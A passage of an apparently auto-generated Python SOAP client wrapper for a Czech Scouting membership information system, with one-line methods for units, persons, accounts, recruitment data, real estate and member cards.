return self._client.service.UnitUpdateJournalParent({"ID_Login": ID_Login, "ID": ID, "ID_Group": ID_Group, "ID_Unit": ID_Unit, "ContainsMembers": ContainsMembers, "CommissionDeadline": CommissionDeadline, "IsVatPayer": IsVatPayer, "ID_TroopArt": ID_TroopArt, "CanUpdateRegistrationNumber": CanUpdateRegistrationNumber, "IsUnitCancel": IsUnitCancel, "JournalParent": JournalParent, "ChangeFreeJournal": ChangeFreeJournal, "ID_UnitParent": ID_UnitParent, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_PersonChangeName": ID_PersonChangeName, "DateChangeName": DateChangeName, "IsPropertyOwner": IsPropertyOwner, "ID_TempFilePropertyAgreement": ID_TempFilePropertyAgreement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "ID_TempFileSeatChange": ID_TempFileSeatChange, "ID_UnitType": ID_UnitType, "UnitType": UnitType, "DisplayName": DisplayName, "SortName": SortName, "RegistrationNumber": RegistrationNumber, "ShortRegistrationNumber": ShortRegistrationNumber, "Location": Location, "IC": IC, "DIC": DIC, "FileReference": FileReference, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "TroopArt": TroopArt, "LogoContent": LogoContent, "LogoExtension": LogoExtension, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "NewDisplayName": NewDisplayName, "CompleteDisplayName": CompleteDisplayName, "PersonChangeName": PersonChangeName, "PropertyAgreementExtension": PropertyAgreementExtension, "PropertyAgreementContent": PropertyAgreementContent, "TroopArtKey": TroopArtKey, "ID_JournalNovice": ID_JournalNovice, "ID_JournalDeliveryType": ID_JournalDeliveryType, "FullDisplayName": FullDisplayName, "DecisionSeatChangeExtension": DecisionSeatChangeExtension, "ShopDiscountBarcode": ShopDiscountBarcode, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
# Načíst seznam činovníků bez vyplněného kontaktu
def PersonAllUnitRegistrationMistake(self, ID_Login, ID_Unit, ID_ContactType=None):
return self._client.service.PersonAllUnitRegistrationMistake({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID_ContactType": ID_ContactType})
# Načíst souhrné informace o skautském adresáři
def PersonCatalogSummary(self, ID_Login):
return self._client.service.PersonCatalogSummary({"ID_Login": ID_Login})
# Načíst seznam osob pro skautský adresář
def PersonAllCatalog(self, ID_Login, RegistrationNumberStartWith, ID_OfferType, Name=None, City=None, RegistrationNumber=None, Unit=None, Phone=None, Email=None):
return self._client.service.PersonAllCatalog({"ID_Login": ID_Login, "RegistrationNumberStartWith": RegistrationNumberStartWith, "ID_OfferType": ID_OfferType, "Name": Name, "City": City, "RegistrationNumber": RegistrationNumber, "Unit": Unit, "Phone": Phone, "Email": Email})
# Načtení limitů sts čísel pro osobu
def PersonDetailTelephonyLimit(self, ID_Login, ID):
return self._client.service.PersonDetailTelephonyLimit({"ID_Login": ID_Login, "ID": ID})
# Editace limitů STS čísel osoby
def PersonUpdateTelephonyLimit(self, ID_Login, ID, TelephonyLimit, DataLimit):
return self._client.service.PersonUpdateTelephonyLimit({"ID_Login": ID_Login, "ID": ID, "TelephonyLimit": TelephonyLimit, "DataLimit": DataLimit})
# Zobrazit detail limitů STS čísel jednotky
def UnitDetailTelephonyLimit(self, ID_Login, ID):
return self._client.service.UnitDetailTelephonyLimit({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam typů jednotek s limity čísel
def UnitTypeAllLimit(self, ID_Login, DisplayName=None):
return self._client.service.UnitTypeAllLimit({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Upravit typ jednotky
def UnitTypeUpdate(self, ID_Login, Level, ContainsMembers, FreeAttachments, CommissionCount, CommissionDeadline, CallLimit, DataLimit, ID=None, DisplayName=None, Note=None, Birdos=None, ID_Instance=None):
return self._client.service.UnitTypeUpdate({"ID_Login": ID_Login, "Level": Level, "ContainsMembers": ContainsMembers, "FreeAttachments": FreeAttachments, "CommissionCount": CommissionCount, "CommissionDeadline": CommissionDeadline, "CallLimit": CallLimit, "DataLimit": DataLimit, "ID": ID, "DisplayName": DisplayName, "Note": Note, "Birdos": Birdos, "ID_Instance": ID_Instance})
# Upravit limit STS čísel jednotky
def UnitUpdateTelephonyLimit(self, ID_Login, ID, TelephonyLimit, DataLimit, DefaultCallLimit, DefaultDataLimit):
return self._client.service.UnitUpdateTelephonyLimit({"ID_Login": ID_Login, "ID": ID, "TelephonyLimit": TelephonyLimit, "DataLimit": DataLimit, "DefaultCallLimit": DefaultCallLimit, "DefaultDataLimit": DefaultDataLimit})
# Načíst seznam osob
def PersonAllIdentificationCode(self, ID_Login, IdentificationCode=None, IdentificationCodeStartsWith=None):
return self._client.service.PersonAllIdentificationCode({"ID_Login": ID_Login, "IdentificationCode": IdentificationCode, "IdentificationCodeStartsWith": IdentificationCodeStartsWith})
# Hledání v registru OJ
def UnitAllRegistryBasic(self, ID_Login, ID_Application, IsValid, Search=None):
return self._client.service.UnitAllRegistryBasic({"ID_Login": ID_Login, "ID_Application": ID_Application, "IsValid": IsValid, "Search": Search})
# Editace základních údajů osoby
def PersonUpdateAddress(self, ID_Login, ID, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None):
return self._client.service.PersonUpdateAddress({"ID_Login": ID_Login, "ID": ID, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState})
# Editace základních údajů osoby
def PersonUpdateBasic(self, ID_Login, ID, Birthday, YearFrom, ID_Sex=None, FirstName=None, LastName=None, NickName=None, MaidenName=None, Street=None, City=None, Postcode=None, State=None):
return self._client.service.PersonUpdateBasic({"ID_Login": ID_Login, "ID": ID, "Birthday": Birthday, "YearFrom": YearFrom, "ID_Sex": ID_Sex, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "MaidenName": MaidenName, "Street": Street, "City": City, "Postcode": Postcode, "State": State})
# Hledání osob pro účastníky tábora
def PersonAllEventCamp(self, ID_Login, ID_EventCamp, ID, DisplayName=None, IdentificationCode=None, IdentificationCodeStartsWith=None):
return self._client.service.PersonAllEventCamp({"ID_Login": ID_Login, "ID_EventCamp": ID_EventCamp, "ID": ID, "DisplayName": DisplayName, "IdentificationCode": IdentificationCode, "IdentificationCodeStartsWith": IdentificationCodeStartsWith})
# Hledání osob pro hromadné přidání účastníků tábora
def PersonAllEventCampMulti(self, ID_Login, ID_EventCamp):
return self._client.service.PersonAllEventCampMulti({"ID_Login": ID_Login, "ID_EventCamp": ID_EventCamp})
# Načíst seznam středisek, pro založení tábora
def UnitAllCamp(self, ID_Login):
return self._client.service.UnitAllCamp({"ID_Login": ID_Login})
# Hledání osob pro účast na sněmu
def PersonAllUstredi(self, ID_Login, ID_EventCongress, ID, DisplayName=None):
return self._client.service.PersonAllUstredi({"ID_Login": ID_Login, "ID_EventCongress": ID_EventCongress, "ID": ID, "DisplayName": DisplayName})
# Hledání dospělých osob
def PersonAllPublic(self, ID_Login, ID, FirstName=None, LastName=None, NickName=None):
return self._client.service.PersonAllPublic({"ID_Login": ID_Login, "ID": ID, "FirstName": FirstName, "LastName": LastName, "NickName": NickName})
# Načíst seznam účtů
def AccountAll(self, ID_Login, ID_Application, ID_Unit, ID_Bank, ShowHistory, IsValid):
return self._client.service.AccountAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_Bank": ID_Bank, "ShowHistory": ShowHistory, "IsValid": IsValid})
# Smazat účet
def AccountDelete(self, ID_Login, ID):
return self._client.service.AccountDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail účtu
def AccountDetail(self, ID_Login, ID):
return self._client.service.AccountDetail({"ID_Login": ID_Login, "ID": ID})
# Založit účet
def AccountInsert(self, ID_Login, ID, ID_Unit, ValidTo, ID_Bank, IsMain, DisplayName=None, Unit=None, Bank=None, AccountPrefix=None, AccountNumber=None, Street=None, City=None, Postcode=None, Note=None):
return self._client.service.AccountInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ValidTo": ValidTo, "ID_Bank": ID_Bank, "IsMain": IsMain, "DisplayName": DisplayName, "Unit": Unit, "Bank": Bank, "AccountPrefix": AccountPrefix, "AccountNumber": AccountNumber, "Street": Street, "City": City, "Postcode": Postcode, "Note": Note})
# Upravit účet
def AccountUpdate(self, ID_Login, ID, ID_Unit, ValidTo, ID_Bank, IsMain, DisplayName=None, Unit=None, Bank=None, AccountPrefix=None, AccountNumber=None, Street=None, City=None, Postcode=None, Note=None):
return self._client.service.AccountUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ValidTo": ValidTo, "ID_Bank": ID_Bank, "IsMain": IsMain, "DisplayName": DisplayName, "Unit": Unit, "Bank": Bank, "AccountPrefix": AccountPrefix, "AccountNumber": AccountNumber, "Street": Street, "City": City, "Postcode": Postcode, "Note": Note})
# Načíst seznam náborových kategorií
def AdvertisingCategoryAll(self, ID_Login, ID_Application, ID_Unit, ID_MeetingDate, ID_Sex=None):
return self._client.service.AdvertisingCategoryAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_MeetingDate": ID_MeetingDate, "ID_Sex": ID_Sex})
# Smazat náborovou kategorii
def AdvertisingCategoryDelete(self, ID_Login, ID):
return self._client.service.AdvertisingCategoryDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail náborové kategorie
def AdvertisingCategoryDetail(self, ID_Login, ID):
return self._client.service.AdvertisingCategoryDetail({"ID_Login": ID_Login, "ID": ID})
# Založit náborovou kategorii
def AdvertisingCategoryInsert(self, ID_Login, ID, ID_Unit, AgeFrom, AgeTo, ID_MeetingDate, Unit=None, ID_Sex=None, Sex=None, MeetingDate=None, Note=None):
return self._client.service.AdvertisingCategoryInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "AgeFrom": AgeFrom, "AgeTo": AgeTo, "ID_MeetingDate": ID_MeetingDate, "Unit": Unit, "ID_Sex": ID_Sex, "Sex": Sex, "MeetingDate": MeetingDate, "Note": Note})
# Upravit náborovou kategorii
def AdvertisingCategoryUpdate(self, ID_Login, ID, ID_Unit, AgeFrom, AgeTo, ID_MeetingDate, Unit=None, ID_Sex=None, Sex=None, MeetingDate=None, Note=None):
return self._client.service.AdvertisingCategoryUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "AgeFrom": AgeFrom, "AgeTo": AgeTo, "ID_MeetingDate": ID_MeetingDate, "Unit": Unit, "ID_Sex": ID_Sex, "Sex": Sex, "MeetingDate": MeetingDate, "Note": Note})
# Načíst náborové informace
def AdvertisingDetail(self, ID_Login, ID_Application, ID_Unit):
return self._client.service.AdvertisingDetail({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit})
# Velká přehledová tabulka náborových údajů
def AdvertisingSummary(self, ID_Login, ID_Application, ID_Unit, IncludeChildUnits, ID_Realty, Distance, GpsLatitude, GpsLongitude):
return self._client.service.AdvertisingSummary({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "IncludeChildUnits": IncludeChildUnits, "ID_Realty": ID_Realty, "Distance": Distance, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude})
# Upravit náborové informace
def AdvertisingUpdate(self, ID_Login, ID, ID_Unit, IsWater, Unit=None, RegistrationNumber=None, ID_UnitType=None, UnitType=None, Note=None):
return self._client.service.AdvertisingUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "IsWater": IsWater, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_UnitType": ID_UnitType, "UnitType": UnitType, "Note": Note})
# Načíst seznam zaměření
def AlignmentAll(self, ID_Login, ID_Application, ID_Unit, ID_AlignmentType, ShowHistory, IsValid):
return self._client.service.AlignmentAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_AlignmentType": ID_AlignmentType, "ShowHistory": ShowHistory, "IsValid": IsValid})
# Načíst detail zaměření
def AlignmentDetail(self, ID_Login, ID):
return self._client.service.AlignmentDetail({"ID_Login": ID_Login, "ID": ID})
# Založit zaměření
def AlignmentInsert(self, ID_Login, ID, ID_Unit, ValidFrom, ValidTo, ID_AlignmentType, Unit=None, AlignmentType=None, ColorMargin=None, ColorCenter=None):
return self._client.service.AlignmentInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_AlignmentType": ID_AlignmentType, "Unit": Unit, "AlignmentType": AlignmentType, "ColorMargin": ColorMargin, "ColorCenter": ColorCenter})
# Načíst seznam zaměření
def AlignmentTypeAll(self, ID_Login, DisplayName=None):
return self._client.service.AlignmentTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Upravit zaměření
def AlignmentUpdate(self, ID_Login, ID, ID_Unit, ValidFrom, ValidTo, ID_AlignmentType, Unit=None, AlignmentType=None, ColorMargin=None, ColorCenter=None):
return self._client.service.AlignmentUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_AlignmentType": ID_AlignmentType, "Unit": Unit, "AlignmentType": AlignmentType, "ColorMargin": ColorMargin, "ColorCenter": ColorCenter})
# Načíst seznam zdravotních pojišťoven
def AssuranceAll(self, ID_Login, ID_Application, DisplayName=None):
return self._client.service.AssuranceAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "DisplayName": DisplayName})
# Načíst seznam bank
def BankAll(self, ID_Login, DisplayName=None, Code=None):
return self._client.service.BankAll({"ID_Login": ID_Login, "DisplayName": DisplayName, "Code": Code})
# Načíst detail banky
def BankDetail(self, ID_Login, ID):
return self._client.service.BankDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam typů kontaktů
def ContactTypeAll(self, ID_Login, IsForPerson, IsForUnit, DisplayName=None, ID=None):
return self._client.service.ContactTypeAll({"ID_Login": ID_Login, "IsForPerson": IsForPerson, "IsForUnit": IsForUnit, "DisplayName": DisplayName, "ID": ID})
# Načíst seznam vzdělávacích akcí
def EducatationSeminaryAll(self, ID_Login, ID_Person, DisplayName=None):
return self._client.service.EducatationSeminaryAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "DisplayName": DisplayName})
# Smazat vzdělávací akci
def EducatationSeminaryDelete(self, ID_Login, ID):
return self._client.service.EducatationSeminaryDelete({"ID_Login": ID_Login, "ID": ID})
# Založit vzdělávací akci
def EducatationSeminaryInsert(self, ID_Login, ID_Person, ID, YearFrom, DisplayName=None, Note=None):
return self._client.service.EducatationSeminaryInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "YearFrom": YearFrom, "DisplayName": DisplayName, "Note": Note})
# Upravit vzdělávací akci
def EducatationSeminaryUpdate(self, ID_Login, ID_Person, ID, YearFrom, DisplayName=None, Note=None):
return self._client.service.EducatationSeminaryUpdate({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "YearFrom": YearFrom, "DisplayName": DisplayName, "Note": Note})
# Načíst seznam osob členem kandidátní komise
def PersonAllEventCongressFunction(self, ID_Login, ID, ID_EventCongressFunction, DisplayName=None):
return self._client.service.PersonAllEventCongressFunction({"ID_Login": ID_Login, "ID": ID, "ID_EventCongressFunction": ID_EventCongressFunction, "DisplayName": DisplayName})
# Načíst detail dalších údajů osoby
def PersonOtherDetail(self, ID_Login, ID):
return self._client.service.PersonOtherDetail({"ID_Login": ID_Login, "ID": ID})
# Upravit další údaje osoby
def PersonOtherUpdate(self, ID_Login, ID, ID_Person, ID_DistrictBirth, ID_Assurance, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, DateChangeSocialNetwork, DateChangeMarketing, DateChangeDataStorage, DateChangeAudiovisual, IsRPS, IsEPS, IsEduParticipantExt, OnlyValidate, ID_EventCongress, ID_TempFileHealth, ID_DocumentHealth, IdCardValidTo, IsAdult, BirthCity=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, Person=None, MaidenName=None, DistrictBirth=None, Assurance=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Note=None, ParentNote=None, IdCardNumber=None):
return self._client.service.PersonOtherUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_DistrictBirth": ID_DistrictBirth, "ID_Assurance": ID_Assurance, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "DateChangeSocialNetwork": DateChangeSocialNetwork, "DateChangeMarketing": DateChangeMarketing, "DateChangeDataStorage": DateChangeDataStorage, "DateChangeAudiovisual": DateChangeAudiovisual, "IsRPS": IsRPS, "IsEPS": IsEPS, "IsEduParticipantExt": IsEduParticipantExt, "OnlyValidate": OnlyValidate, "ID_EventCongress": ID_EventCongress, "ID_TempFileHealth": ID_TempFileHealth, "ID_DocumentHealth": ID_DocumentHealth, "IdCardValidTo": IdCardValidTo, "IsAdult": IsAdult, "BirthCity": BirthCity, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "Person": Person, "MaidenName": MaidenName, "DistrictBirth": DistrictBirth, "Assurance": Assurance, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Note": Note, "ParentNote": ParentNote, "IdCardNumber": IdCardNumber})
# Načíst detail potvrzení o studiu pro osobu
def PersonSchoolDetailPerson(self, ID_Login, ID_Person):
return self._client.service.PersonSchoolDetailPerson({"ID_Login": ID_Login, "ID_Person": ID_Person})
# Upravit údaje k potvrzení o studiu
def PersonSchoolUpdateSchool(self, ID_Login, ID, ID_Person, DateCreate, ID_TempFile, ID_PersonSchoolTempFile, ID_DocumentPhoto, ID_DocumentScan, Person=None, DisplayName=None, City=None, Extension=None, Scan=None, PhotoExtension=None, Photo=None):
return self._client.service.PersonSchoolUpdateSchool({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "DateCreate": DateCreate, "ID_TempFile": ID_TempFile, "ID_PersonSchoolTempFile": ID_PersonSchoolTempFile, "ID_DocumentPhoto": ID_DocumentPhoto, "ID_DocumentScan": ID_DocumentScan, "Person": Person, "DisplayName": DisplayName, "City": City, "Extension": Extension, "Scan": Scan, "PhotoExtension": PhotoExtension, "Photo": Photo})
# Editace osoby
def PersonDeletePhoto(self, ID_Login, ID):
return self._client.service.PersonDeletePhoto({"ID_Login": ID_Login, "ID": ID})
# Změna údajů osoby
def PersonUpdatePersonChange(self, ID_Login, ID_Application, Code, Birthday, BirthdayYear, IsForeign, YearFrom, ID_User, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, RejectDataStorage, IdentificationCodeForce, GenerateSecurityCode, ID_TempFile, ID_PersonPhotoBig, ID_PersonPhotoMedium, ID_PersonPhotoNormal, ID_PersonPhotoSmall, IdentificationCode=None, FirstName=None, LastName=None, NickName=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, ID_Sex=None, RegistrationNumber=None, PhotoExtension=None, PhotoContent=None, MaidenName=None, AddressDistrict=None, PostalDistrict=None, UnitEnrollExtension=None, UnitEnroll=None):
return self._client.service.PersonUpdatePersonChange({"ID_Login": ID_Login, "ID_Application": ID_Application, "Code": Code, "Birthday": Birthday, "BirthdayYear": BirthdayYear, "IsForeign": IsForeign, "YearFrom": YearFrom, "ID_User": ID_User, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "RejectDataStorage": RejectDataStorage, "IdentificationCodeForce": IdentificationCodeForce, "GenerateSecurityCode": GenerateSecurityCode, "ID_TempFile": ID_TempFile, "ID_PersonPhotoBig": ID_PersonPhotoBig, "ID_PersonPhotoMedium": ID_PersonPhotoMedium, "ID_PersonPhotoNormal": ID_PersonPhotoNormal, "ID_PersonPhotoSmall": ID_PersonPhotoSmall, "IdentificationCode": IdentificationCode, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "Address": Address, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalAddress": PostalAddress, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "ID_Sex": ID_Sex, "RegistrationNumber": RegistrationNumber, "PhotoExtension": PhotoExtension, "PhotoContent": PhotoContent, "MaidenName": MaidenName, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "UnitEnrollExtension": UnitEnrollExtension, "UnitEnroll": UnitEnroll})
# Načíst seznam nových kvalifikací v daném období
def QualificationAllNew(self, ID_Login, From, To, ID_QualificationTypeList=None):
return self._client.service.QualificationAllNew({"ID_Login": ID_Login, "From": From, "To": To, "ID_QualificationTypeList": ID_QualificationTypeList})
# Načíst názvy typů kvalifikace ze zadaného seznamu
def QualificationTypeAllList(self, ID_Login, ID_QualificationTypeList=None):
return self._client.service.QualificationTypeAllList({"ID_Login": ID_Login, "ID_QualificationTypeList": ID_QualificationTypeList})
# Načíst seznam nemovitostí pro soubor nemovitostí
def RealtyAllRealtyTypeCountPublic(self, ID_Login, ID_Application):
return self._client.service.RealtyAllRealtyTypeCountPublic({"ID_Login": ID_Login, "ID_Application": ID_Application})
# Přepočet blízkých bodů
def RealtyCollectionGroupByPosition(self, ID_Login):
return self._client.service.RealtyCollectionGroupByPosition({"ID_Login": ID_Login})
# Načíst seznam půjčitelných nemovitostí/souboru nemovitostí
def RealtyCollectionAllBorrowable(self, ID_Application, ID_Login, GpsLatitude, GpsLongitude, Distance, Price, Date, Capacity, BorrowableForeign, DisplayName=None, RegionList=None, DistrictList=None, City=None, Unit=None, OwnerTypeList=None, RealtyTypeList=None, OccupationEquipmentList=None, RealtyCollectionLocationList=None, PriceType=None, OccupationLanguageList=None, OccupationTagList=None):
return self._client.service.RealtyCollectionAllBorrowable({"ID_Application": ID_Application, "ID_Login": ID_Login, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "Distance": Distance, "Price": Price, "Date": Date, "Capacity": Capacity, "BorrowableForeign": BorrowableForeign, "DisplayName": DisplayName, "RegionList": RegionList, "DistrictList": DistrictList, "City": City, "Unit": Unit, "OwnerTypeList": OwnerTypeList, "RealtyTypeList": RealtyTypeList, "OccupationEquipmentList": OccupationEquipmentList, "RealtyCollectionLocationList": RealtyCollectionLocationList, "PriceType": PriceType, "OccupationLanguageList": OccupationLanguageList, "OccupationTagList": OccupationTagList})
# Načíst seznam souborů nemovitostí
def RealtyCollectionAll(self, ID_Login, ID_Unit, ID, ID_User, DisplayName=None):
return self._client.service.RealtyCollectionAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "ID_User": ID_User, "DisplayName": DisplayName})
# Načíst detail půjčitelné nemovitosti/souboru nemovitostí
def RealtyCollectionDetailBorrowable(self, ID_Application, ID, ID_Login):
return self._client.service.RealtyCollectionDetailBorrowable({"ID_Application": ID_Application, "ID": ID, "ID_Login": ID_Login})
# Načíst detail souboru nemovitostí
def RealtyCollectionDetailPhoto(self, ID_TempFilePhoto, ID_Login, ID, ID_Unit, ID_User, IsActive, GpsLatitude, GpsLongitude, HasAddress, ID_Region, ID_Document, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, Unit=None, UnitRegistrationNumber=None, Owner=None, DisplayName=None, Description=None, Web=None, Street=None, City=None, Postcode=None, District=None, TransportationMethods=None, TransportationMethodsText=None, TransportDescription=None, Locations=None, LocationsText=None, PointsOfInterest=None, Note=None, Region=None, Storage=None):
return self._client.service.RealtyCollectionDetailPhoto({"ID_TempFilePhoto": ID_TempFilePhoto, "ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_User": ID_User, "IsActive": IsActive, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "HasAddress": HasAddress, "ID_Region": ID_Region, "ID_Document": ID_Document, "PhotoExtension": PhotoExtension, "PhotoFileContent": PhotoFileContent, "FotogalleryUrl": FotogalleryUrl, "Unit": Unit, "UnitRegistrationNumber": UnitRegistrationNumber, "Owner": Owner, "DisplayName": DisplayName, "Description": Description, "Web": Web, "Street": Street, "City": City, "Postcode": Postcode, "District": District, "TransportationMethods": TransportationMethods, "TransportationMethodsText": TransportationMethodsText, "TransportDescription": TransportDescription, "Locations": Locations, "LocationsText": LocationsText, "PointsOfInterest": PointsOfInterest, "Note": Note, "Region": Region, "Storage": Storage})
# Založit soubor nemovitostí
def RealtyCollectionInsert(self, ID_TempFilePhoto, RealtyIsPower, ID_RealtyTempFilePhoto, ID_Login, ID_Unit, ID_User, HasAddress, GpsLatitude, GpsLongitude, LVNumber, Acreage, FotogalleryUrl=None, RealtyDisplayName=None, RealtyDescription=None, RealtyFotogalleryUrl=None, ID_RealtyOwnerType=None, RealtyOwnerTypeNote=None, RealtyNote=None, ID_RealtyRegisterType=None, DisplayName=None, Description=None, Web=None, Street=None, City=None, Postcode=None, District=None, TransportationMethods=None, TransportDescription=None, PointsOfInterest=None, Locations=None, Note=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None):
return self._client.service.RealtyCollectionInsert({"ID_TempFilePhoto": ID_TempFilePhoto, "RealtyIsPower": RealtyIsPower, "ID_RealtyTempFilePhoto": ID_RealtyTempFilePhoto, "ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID_User": ID_User, "HasAddress": HasAddress, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "LVNumber": LVNumber, "Acreage": Acreage, "FotogalleryUrl": FotogalleryUrl, "RealtyDisplayName": RealtyDisplayName, "RealtyDescription": RealtyDescription, "RealtyFotogalleryUrl": RealtyFotogalleryUrl, "ID_RealtyOwnerType": ID_RealtyOwnerType, "RealtyOwnerTypeNote": RealtyOwnerTypeNote, "RealtyNote": RealtyNote, "ID_RealtyRegisterType": ID_RealtyRegisterType, "DisplayName": DisplayName, "Description": Description, "Web": Web, "Street": Street, "City": City, "Postcode": Postcode, "District": District, "TransportationMethods": TransportationMethods, "TransportDescription": TransportDescription, "PointsOfInterest": PointsOfInterest, "Locations": Locations, "Note": Note, "ParcelNumber": ParcelNumber, "RegisterCity": RegisterCity, "CadastralArea": CadastralArea, "ParcelType": ParcelType, "LandType": LandType})
# Načíst detail nemovitosti
def RealtyDetailPhoto(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
return self._client.service.RealtyDetailPhoto({"ID_Login": ID_Login, "ID": ID, "ID_RealtyType": ID_RealtyType, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "ID_RealtyCollection": ID_RealtyCollection, "IsPower": IsPower, "ValidTo": ValidTo, "IsActive": IsActive, "ID_TempFilePhoto": ID_TempFilePhoto, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_Document": ID_Document, "LVNumber": LVNumber, "Acreage": Acreage, "RealtyGpsLatitude": RealtyGpsLatitude, "RealtyGpsLongitude": RealtyGpsLongitude, "CoordinateX": CoordinateX, "CoordinateY": CoordinateY, "DisplayName": DisplayName, "RealtyType": RealtyType, "Street": Street, "City": City, "Postcode": Postcode, "Description": Description, "Note": Note, "RealtyCollection": RealtyCollection, "ID_OwnerType": ID_OwnerType, "OwnerType": OwnerType, "OwnerTypeNote": OwnerTypeNote, "PhotoExtension": PhotoExtension, "PhotoFileContent": PhotoFileContent, "FotogalleryUrl": FotogalleryUrl, "District": District, "Storage": Storage, "ParcelNumber": ParcelNumber, "RegisterCity": RegisterCity, "CadastralArea": CadastralArea, "ParcelType": ParcelType, "LandType": LandType, "Unit": Unit, "UnitRegistrationNumber": UnitRegistrationNumber})
# Smazat dokument
def RealtyDocumentDelete(self, ID_Login, ID):
return self._client.service.RealtyDocumentDelete({"ID_Login": ID_Login, "ID": ID})
# No documentation
def RealtyDocumentDetail(self, ID_Login, ID):
return self._client.service.RealtyDocumentDetail({"ID_Login": ID_Login, "ID": ID})
# Stáhnout dokument
def RealtyDocumentDownload(self, ID_Login, ID):
return self._client.service.RealtyDocumentDownload({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam členských karet
def MemberCardAllMemberCardInvoice(self, ID_Login, ID_MemberCardInvoice):
return self._client.service.MemberCardAllMemberCardInvoice({"ID_Login": ID_Login, "ID_MemberCardInvoice": ID_MemberCardInvoice})
